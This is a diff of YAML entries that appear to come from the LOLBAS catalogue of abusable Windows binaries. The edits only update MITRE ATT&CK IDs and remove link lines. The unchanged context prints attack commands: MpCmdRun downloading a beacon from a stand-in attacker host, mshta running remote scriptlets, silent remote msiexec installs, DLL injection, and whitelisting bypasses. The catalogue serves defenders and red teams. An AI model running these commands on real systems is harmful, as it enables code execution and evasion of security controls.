|
||||||
|
@ -10,7 +10,6 @@ Commands:
|
|||||||
Category: Compile
|
Category: Compile
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1127
|
MitreID: T1127
|
||||||
MitreLink: https://attack.mitre.org/techniques/T1127/
|
|
||||||
OperatingSystem: Windows 10,7
|
OperatingSystem: Windows 10,7
|
||||||
- Command: ilasm.exe C:\public\test.txt /dll
|
- Command: ilasm.exe C:\public\test.txt /dll
|
||||||
Description: Binary file used by .NET to compile c# code to dll
|
Description: Binary file used by .NET to compile c# code to dll
|
||||||
@ -18,7 +17,6 @@ Commands:
|
|||||||
Category: Compile
|
Category: Compile
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1127
|
MitreID: T1127
|
||||||
MitreLink: https://attack.mitre.org/techniques/T1127/
|
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
|
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
|
||||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe
|
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe
|
||||||
|
@ -10,7 +10,6 @@ Commands:
|
|||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\Infdefaultinstall.exe
|
- Path: C:\Windows\System32\Infdefaultinstall.exe
|
||||||
|
@ -9,16 +9,14 @@ Commands:
|
|||||||
Usecase: Use to execute code and bypass application whitelisting
|
Usecase: Use to execute code and bypass application whitelisting
|
||||||
Category: AWL bypass
|
Category: AWL bypass
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1118
|
MitreID: T1218.004
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1118
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
|
- Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
|
||||||
Description: Execute the target .NET DLL or EXE.
|
Description: Execute the target .NET DLL or EXE.
|
||||||
Usecase: Use to execute code and bypass application whitelisting
|
Usecase: Use to execute code and bypass application whitelisting
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1118
|
MitreID: T1218.004
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1118
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe
|
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe
|
||||||
@ -32,7 +30,7 @@ Detection:
|
|||||||
Resources:
|
Resources:
|
||||||
- Link: https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/
|
- Link: https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/
|
||||||
- Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12
|
- Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12
|
||||||
- Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1118/T1118.md
|
- Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md
|
||||||
- Link: https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/
|
- Link: https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/
|
||||||
- Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
|
- Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
|
||||||
- Link: https://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool
|
- Link: https://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool
|
||||||
|
@ -10,7 +10,6 @@ Commands:
|
|||||||
Category: Compile
|
Category: Compile
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1127
|
MitreID: T1127
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: jsc.exe /t:library Library.js
|
- Command: jsc.exe /t:library Library.js
|
||||||
Description: Use jsc.exe to compile javascript code stored in Library.js and output Library.dll.
|
Description: Use jsc.exe to compile javascript code stored in Library.js and output Library.dll.
|
||||||
@ -18,7 +17,6 @@ Commands:
|
|||||||
Category: Compile
|
Category: Compile
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1127
|
MitreID: T1127
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Jsc.exe
|
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Jsc.exe
|
||||||
|
@ -9,16 +9,14 @@ Commands:
|
|||||||
Usecase: Hide data compressed into an alternate data stream
|
Usecase: Hide data compressed into an alternate data stream
|
||||||
Category: ADS
|
Category: ADS
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1096
|
MitreID: T1564.004
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.txt:file.cab
|
- Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.txt:file.cab
|
||||||
Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.
|
Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.
|
||||||
Usecase: Hide data compressed into an alternate data stream
|
Usecase: Hide data compressed into an alternate data stream
|
||||||
Category: ADS
|
Category: ADS
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1096
|
MitreID: T1564.004
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab
|
- Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab
|
||||||
Description: Download and compresses the target file and stores it in the target file.
|
Description: Download and compresses the target file and stores it in the target file.
|
||||||
@ -26,7 +24,6 @@ Commands:
|
|||||||
Category: Download
|
Category: Download
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1105
|
MitreID: T1105
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\makecab.exe
|
- Path: C:\Windows\System32\makecab.exe
|
||||||
|
@ -9,16 +9,14 @@ Commands:
|
|||||||
Usecase: Inject dll file into running process
|
Usecase: Inject dll file into running process
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218.013
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll"
|
- Command: Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll"
|
||||||
Description: Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172
|
Description: Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172
|
||||||
Usecase: Inject dll file into running process
|
Usecase: Inject dll file into running process
|
||||||
Category: ADS
|
Category: ADS
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1096
|
MitreID: T1564.004
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\mavinject.exe
|
- Path: C:\Windows\System32\mavinject.exe
|
||||||
|
@ -10,7 +10,6 @@ Commands:
|
|||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1127
|
MitreID: T1127
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
|
|
||||||
OperatingSystem: Windows 10S
|
OperatingSystem: Windows 10S
|
||||||
- Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt
|
- Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt
|
||||||
Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file.
|
Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file.
|
||||||
@ -18,7 +17,6 @@ Commands:
|
|||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1127
|
MitreID: T1127
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
|
|
||||||
OperatingSystem: Windows 10S
|
OperatingSystem: Windows 10S
|
||||||
- Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt
|
- Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt
|
||||||
Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file.
|
Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file.
|
||||||
@ -26,7 +24,6 @@ Commands:
|
|||||||
Category: AWL Bypass
|
Category: AWL Bypass
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1127
|
MitreID: T1127
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
|
|
||||||
OperatingSystem: Windows 10S
|
OperatingSystem: Windows 10S
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe
|
- Path: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe
|
||||||
|
@ -9,8 +9,7 @@ Commands:
|
|||||||
Usecase: Configure a snap-in to load a COM custom class (CLSID) that has been added to the registry
|
Usecase: Configure a snap-in to load a COM custom class (CLSID) that has been added to the registry
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218.014
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
|
||||||
OperatingSystem: Windows 10 (and possibly earlier versions)
|
OperatingSystem: Windows 10 (and possibly earlier versions)
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\mmc.exe
|
- Path: C:\Windows\System32\mmc.exe
|
||||||
|
@ -10,7 +10,6 @@ Commands:
|
|||||||
Category: Download
|
Category: Download
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1105
|
MitreID: T1105
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
|
||||||
OperatingSystem: Windows 10
|
OperatingSystem: Windows 10
|
||||||
- Command: copy "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" C:\Users\Public\Downloads\MP.exe && chdir "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\" && "C:\Users\Public\Downloads\MP.exe" -DownloadFile -url https://attacker.server/beacon.exe -path C:\Users\Public\Downloads\evil.exe
|
- Command: copy "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" C:\Users\Public\Downloads\MP.exe && chdir "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\" && "C:\Users\Public\Downloads\MP.exe" -DownloadFile -url https://attacker.server/beacon.exe -path C:\Users\Public\Downloads\evil.exe
|
||||||
Description: Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path) [updated version to bypass Windows 10 mitigation]
|
Description: Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path) [updated version to bypass Windows 10 mitigation]
|
||||||
@ -18,15 +17,13 @@ Commands:
|
|||||||
Category: Download
|
Category: Download
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1105
|
MitreID: T1105
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
|
||||||
OperatingSystem: Windows 10
|
OperatingSystem: Windows 10
|
||||||
- Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\nicefile.txt:evil.exe
|
- Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\nicefile.txt:evil.exe
|
||||||
Description: Download file to machine and store it in Alternate Data Stream
|
Description: Download file to machine and store it in Alternate Data Stream
|
||||||
Usecase: Hide downloaded data inton an Alternate Data Stream
|
Usecase: Hide downloaded data inton an Alternate Data Stream
|
||||||
Category: ADS
|
Category: ADS
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1096
|
MitreID: T1564.004
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
|
||||||
OperatingSystem: Windows 10
|
OperatingSystem: Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.4-0\MpCmdRun.exe
|
- Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.4-0\MpCmdRun.exe
|
||||||
|
@ -10,7 +10,6 @@ Commands:
|
|||||||
Category: AWL bypass
|
Category: AWL bypass
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1127
|
MitreID: T1127
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: msbuild.exe project.csproj
|
- Command: msbuild.exe project.csproj
|
||||||
Description: Build and execute a C# project stored in the target csproj file.
|
Description: Build and execute a C# project stored in the target csproj file.
|
||||||
@ -18,7 +17,6 @@ Commands:
|
|||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1127
|
MitreID: T1127
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: msbuild.exe @sample.rsp
|
- Command: msbuild.exe @sample.rsp
|
||||||
Description: Executes Logger statements from rsp file
|
Description: Executes Logger statements from rsp file
|
||||||
@ -42,7 +40,6 @@ Commands:
|
|||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1127
|
MitreID: T1127
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe
|
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe
|
||||||
|
@ -10,7 +10,6 @@ Commands:
|
|||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: Administrator
|
Privileges: Administrator
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\msconfig.exe
|
- Path: C:\Windows\System32\msconfig.exe
|
||||||
|
@ -10,7 +10,6 @@ Commands:
|
|||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
|
- Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
|
||||||
Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
|
Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
|
||||||
@ -18,7 +17,6 @@ Commands:
|
|||||||
Category: AWL bypass
|
Category: AWL bypass
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\Msdt.exe
|
- Path: C:\Windows\System32\Msdt.exe
|
||||||
|
@ -9,32 +9,28 @@ Commands:
|
|||||||
Usecase: Execute code
|
Usecase: Execute code
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1170
|
MitreID: T1218.005
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1170
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))
|
- Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))
|
||||||
Description: Executes VBScript supplied as a command line argument.
|
Description: Executes VBScript supplied as a command line argument.
|
||||||
Usecase: Execute code
|
Usecase: Execute code
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1170
|
MitreID: T1218.005
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1170
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct").Exec();close();
|
- Command: mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct").Exec();close();
|
||||||
Description: Executes JavaScript supplied as a command line argument.
|
Description: Executes JavaScript supplied as a command line argument.
|
||||||
Usecase: Execute code
|
Usecase: Execute code
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1170
|
MitreID: T1218.005
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1170
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: mshta.exe "C:\ads\file.txt:file.hta"
|
- Command: mshta.exe "C:\ads\file.txt:file.hta"
|
||||||
Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.
|
Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.
|
||||||
Usecase: Execute code hidden in alternate data stream
|
Usecase: Execute code hidden in alternate data stream
|
||||||
Category: ADS
|
Category: ADS
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1170
|
MitreID: T1218.005
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1170
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 (Does not work on 1903 and newer)
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 (Does not work on 1903 and newer)
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\mshta.exe
|
- Path: C:\Windows\System32\mshta.exe
|
||||||
|
@ -9,32 +9,28 @@ Commands:
|
|||||||
Usecase: Execute custom made msi file with attack code
|
Usecase: Execute custom made msi file with attack code
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218.007
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: msiexec /q /i http://192.168.100.3/tmp/cmd.png
|
- Command: msiexec /q /i http://192.168.100.3/tmp/cmd.png
|
||||||
Description: Installs the target remote & renamed .MSI file silently.
|
Description: Installs the target remote & renamed .MSI file silently.
|
||||||
Usecase: Execute custom made msi file with attack code from remote server
|
Usecase: Execute custom made msi file with attack code from remote server
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218.007
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: msiexec /y "C:\folder\evil.dll"
|
- Command: msiexec /y "C:\folder\evil.dll"
|
||||||
Description: Calls DLLRegisterServer to register the target DLL.
|
Description: Calls DLLRegisterServer to register the target DLL.
|
||||||
Usecase: Execute dll files
|
Usecase: Execute dll files
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218.007
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: msiexec /z "C:\folder\evil.dll"
|
- Command: msiexec /z "C:\folder\evil.dll"
|
||||||
Description: Calls DLLRegisterServer to un-register the target DLL.
|
Description: Calls DLLRegisterServer to un-register the target DLL.
|
||||||
Usecase: Execute dll files
|
Usecase: Execute dll files
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218.007
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\msiexec.exe
|
- Path: C:\Windows\System32\msiexec.exe
|
||||||
|
@ -9,8 +9,7 @@ Commands:
|
|||||||
Usecase: Proxy execution of .dll
|
Usecase: Proxy execution of .dll
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1128
|
MitreID: T1546.007
|
||||||
MitreLink: https://attack.mitre.org/techniques/T1128/
|
|
||||||
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\WINDOWS\System32\Netsh.exe
|
- Path: C:\WINDOWS\System32\Netsh.exe
|
||||||
|
@ -10,7 +10,6 @@ Commands:
|
|||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: odbcconf /a {REGSVR c:\test\test.dll}
|
- Command: odbcconf /a {REGSVR c:\test\test.dll}
|
||||||
Description: Execute DllREgisterServer from DLL specified.
|
Description: Execute DllREgisterServer from DLL specified.
|
||||||
@ -18,7 +17,6 @@ Commands:
|
|||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\odbcconf.exe
|
- Path: C:\Windows\System32\odbcconf.exe
|
||||||
|
@ -10,7 +10,6 @@ Commands:
|
|||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: Administrator
|
Privileges: Administrator
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218/
|
|
||||||
OperatingSystem: Windows 10
|
OperatingSystem: Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Program Files\Windows Defender\Offline\OfflineScannerShell.exe
|
- Path: C:\Program Files\Windows Defender\Offline\OfflineScannerShell.exe
|
||||||
|
@ -10,7 +10,6 @@ Commands:
|
|||||||
Category: Download
|
Category: Download
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1105
|
MitreID: T1105
|
||||||
MitreLink: https://attack.mitre.org/techniques/T1105/
|
|
||||||
OperatingSystem: Windows 10
|
OperatingSystem: Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: '%localappdata%\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe'
|
- Path: '%localappdata%\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe'
|
||||||
|
@ -10,7 +10,6 @@ Commands:
|
|||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: pcalua.exe -a \\server\payload.dll
|
- Command: pcalua.exe -a \\server\payload.dll
|
||||||
Description: Open the target .DLL file with the Program Compatibilty Assistant.
|
Description: Open the target .DLL file with the Program Compatibilty Assistant.
|
||||||
@ -18,7 +17,6 @@ Commands:
|
|||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java
|
- Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java
|
||||||
Description: Open the target .CPL file with the Program Compatibility Assistant.
|
Description: Open the target .CPL file with the Program Compatibility Assistant.
|
||||||
@ -26,7 +24,6 @@ Commands:
|
|||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
|
||||||
